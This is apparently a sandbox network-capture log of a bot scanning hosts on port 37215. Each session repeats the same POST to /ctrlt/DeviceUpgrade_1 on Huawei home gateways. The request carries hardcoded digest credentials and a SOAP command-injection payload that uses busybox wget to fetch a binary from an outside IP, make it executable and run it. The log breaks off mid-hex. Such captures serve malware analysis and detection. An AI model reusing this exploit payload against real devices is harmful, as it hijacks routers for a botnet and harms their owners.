                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1245192.168.2.1534042197.180.23.24637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729379892 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1246192.168.2.1551860197.24.84.22337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729423046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1247192.168.2.1548958197.87.120.13337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729425907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1248192.168.2.1549390197.99.33.9037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729437113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1249192.168.2.1533954197.97.171.2937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729446888 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1250192.168.2.1537344197.35.254.8637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729494095 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1251192.168.2.1542754197.198.208.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729516983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1252192.168.2.1539222197.35.5.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729516983 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1253192.168.2.1552986197.239.246.25237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729572058 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            1254192.168.2.1536596197.29.240.22037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:12.729581118 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 